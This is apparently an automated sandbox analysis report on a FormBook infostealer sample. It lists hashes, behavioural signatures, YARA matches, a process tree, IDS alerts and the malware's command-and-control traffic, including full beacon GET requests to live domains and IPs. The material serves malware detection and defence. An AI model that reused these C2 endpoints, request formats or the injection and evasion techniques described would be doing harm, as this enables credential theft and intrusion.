
Windows Analysis Report
enkJ6J7dAn.exe

Overview

General Information

Sample name: enkJ6J7dAn.exe (renamed because original name is a hash value)
Original sample name: 6cf789bf69a166e597d5befad3751a5153799bbcc4b1337b4c8f3af996b0650f.exe
Analysis ID: 1529036
MD5: dc1b0b674722f76e68cdfcd373c34ab9
SHA1: c6862db7bccf03b7e3a66f98cc05b4bf624cc9fa
SHA256: 6cf789bf69a166e597d5befad3751a5153799bbcc4b1337b4c8f3af996b0650f
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • enkJ6J7dAn.exe (PID: 5588 cmdline: "C:\Users\user\Desktop\enkJ6J7dAn.exe" MD5: DC1B0B674722F76E68CDFCD373C34AB9)
    • svchost.exe (PID: 6716 cmdline: "C:\Users\user\Desktop\enkJ6J7dAn.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • avmjQSNkeFbUoa.exe (PID: 4984 cmdline: "C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RmClient.exe (PID: 6348 cmdline: "C:\Windows\SysWOW64\RmClient.exe" MD5: CE765DCC7CDFDC1BFD94CCB772C75E41)
          • avmjQSNkeFbUoa.exe (PID: 4568 cmdline: "C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3180 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches (memory dumps): Source | Rule | Description | Author | Strings

Source: 00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmp
Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security

Source: 00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmp
Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  • 0x2bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13eaf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Source: 00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmp
Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security

Source: 00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmp
Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  • 0x2bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13eaf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Source: 00000003.00000002.4589939639.00000000026F0000.00000040.00000001.00040000.00000000.sdmp
Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Yara matches (unpacked PE files): Source | Rule | Description | Author | Strings

Source: 2.2.svchost.exe.400000.0.unpack
Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security

Source: 2.2.svchost.exe.400000.0.unpack
Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  • 0x2e333:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16462:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Source: 2.2.svchost.exe.400000.0.raw.unpack
Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security

Source: 2.2.svchost.exe.400000.0.raw.unpack
Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  • 0x2f133:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17262:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\enkJ6J7dAn.exe", CommandLine: "C:\Users\user\Desktop\enkJ6J7dAn.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\enkJ6J7dAn.exe", ParentImage: C:\Users\user\Desktop\enkJ6J7dAn.exe, ParentProcessId: 5588, ParentProcessName: enkJ6J7dAn.exe, ProcessCommandLine: "C:\Users\user\Desktop\enkJ6J7dAn.exe", ProcessId: 6716, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\enkJ6J7dAn.exe", CommandLine: "C:\Users\user\Desktop\enkJ6J7dAn.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\enkJ6J7dAn.exe", ParentImage: C:\Users\user\Desktop\enkJ6J7dAn.exe, ParentProcessId: 5588, ParentProcessName: enkJ6J7dAn.exe, ProcessCommandLine: "C:\Users\user\Desktop\enkJ6J7dAn.exe", ProcessId: 6716, ProcessName: svchost.exe


            AV Detection

Source: enkJ6J7dAn.exe | ReversingLabs: Detection: 71%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4589939639.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2375723470.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2374576384.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4590169358.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4590296108.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: enkJ6J7dAn.exe | Joe Sandbox ML: detected
Source: enkJ6J7dAn.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: RmClient.pdbGCTL source: svchost.exe, 00000002.00000002.2374917499.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374956046.0000000003019000.00000004.00000020.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000003.00000002.4589350365.0000000000998000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: avmjQSNkeFbUoa.exe, 00000003.00000000.2259492562.000000000040E000.00000002.00000001.01000000.00000004.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000000.2442142227.000000000040E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: enkJ6J7dAn.exe, 00000000.00000003.2141666109.0000000004680000.00000004.00001000.00020000.00000000.sdmp, enkJ6J7dAn.exe, 00000000.00000003.2141537980.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2241727497.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2375121022.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2375121022.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2243530836.0000000003400000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000003.2377156797.0000000002C42000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4590623216.0000000002F8E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4590623216.0000000002DF0000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000005.00000003.2374869041.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: enkJ6J7dAn.exe, 00000000.00000003.2141666109.0000000004680000.00000004.00001000.00020000.00000000.sdmp, enkJ6J7dAn.exe, 00000000.00000003.2141537980.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2241727497.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2375121022.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2375121022.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2243530836.0000000003400000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, RmClient.exe, 00000005.00000003.2377156797.0000000002C42000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4590623216.0000000002F8E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4590623216.0000000002DF0000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000005.00000003.2374869041.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RmClient.exe, 00000005.00000002.4591201110.000000000341C000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000005.00000002.4588947900.000000000096D000.00000004.00000020.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000000.2442714328.00000000032CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2664524956.00000000006DC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RmClient.exe, 00000005.00000002.4591201110.000000000341C000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000005.00000002.4588947900.000000000096D000.00000004.00000020.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000000.2442714328.00000000032CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2664524956.00000000006DC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: RmClient.pdb source: svchost.exe, 00000002.00000002.2374917499.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374956046.0000000003019000.00000004.00000020.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000003.00000002.4589350365.0000000000998000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_0069C280 FindFirstFileW,FindNextFileW,FindClose,5_2_0069C280
Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 4x nop then xor eax, eax | 5_2_00689A00
Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 4x nop then mov ebx, 00000004h | 5_2_02CE04E1

            Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49863 -> 44.213.25.70:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49979 -> 206.119.82.134:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49979 -> 206.119.82.134:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49980 -> 67.223.117.189:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49986 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49981 -> 67.223.117.189:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 133.130.35.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49988 -> 183.181.83.131:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49984 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49973 -> 206.119.82.134:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 172.191.244.62:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 154.212.219.2:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49983 -> 67.223.117.189:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49983 -> 67.223.117.189:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49982 -> 67.223.117.189:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50003 -> 154.212.219.2:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50003 -> 154.212.219.2:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50023 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50023 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50015 -> 172.191.244.62:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50015 -> 172.191.244.62:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 162.241.244.106:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 38.47.232.196:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 162.241.244.106:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49994 -> 38.47.232.196:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 133.130.35.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 133.130.35.90:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49995 -> 38.47.232.196:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49995 -> 38.47.232.196:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 154.212.219.2:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50014 -> 172.191.244.62:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 162.241.244.106:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49978 -> 206.119.82.134:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 183.181.83.131:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49992 -> 38.47.232.196:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49991 -> 183.181.83.131:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49991 -> 183.181.83.131:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49990 -> 183.181.83.131:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 172.191.244.62:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49999 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49999 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 154.212.219.2:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49987 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49987 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50011 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50011 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50022 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50007 -> 133.130.35.90:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50007 -> 133.130.35.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49956 -> 206.119.82.134:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50019 -> 162.241.244.106:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50019 -> 162.241.244.106:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49863 -> 44.213.25.70:80
            Source: DNS query: www.uburn.xyz
            Source: DNS query: www.nakama2-sshl.xyz
            Source: DNS query: www.lurknlarkk.xyz
            Source: Joe Sandbox View | IP Address: 172.191.244.62
            Source: Joe Sandbox View | IP Address: 67.223.117.189
            Source: Joe Sandbox View | IP Address: 154.212.219.2
            Source: Joe Sandbox View | ASN Name: ATT-INTERNET4US
            Source: Joe Sandbox View | ASN Name: VIMRO-AS15189US
            Source: Joe Sandbox View | ASN Name: COMING-ASABCDEGROUPCOMPANYLIMITEDHK
            Source: Joe Sandbox View | ASN Name: AMAZON-AESUS
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile
            Source: global trafficHTTP traffic detected: GET /7mju/?ntHx=DVDDWR70P4Ux&nV=n/a1XNlERIMSMkzeywaNMrPIuUD1rrysoFUi8ENskqLMFqSk/Fj/a6kaQHlAIjdrNEumw+uIAi046Spw4+rc6qM4fhKpxjqsp0T9dbSaLHAdgBuOtHQwGARxDApDg0JQqA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.newdaydawning.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /l8if/?nV=fb3YagVOau/9jH9KlQpUGbOr1Qdfq6yMjiH+G1UmZCjbhiKuBNxm8T0bbvZrtC77cOtGQaEUv2efn6v6V0Ivj11bpGL/ZxGuw2XpQMT5FisIZ1T3bTfJHsfnS4K0yfQKpg==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.40wxd.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
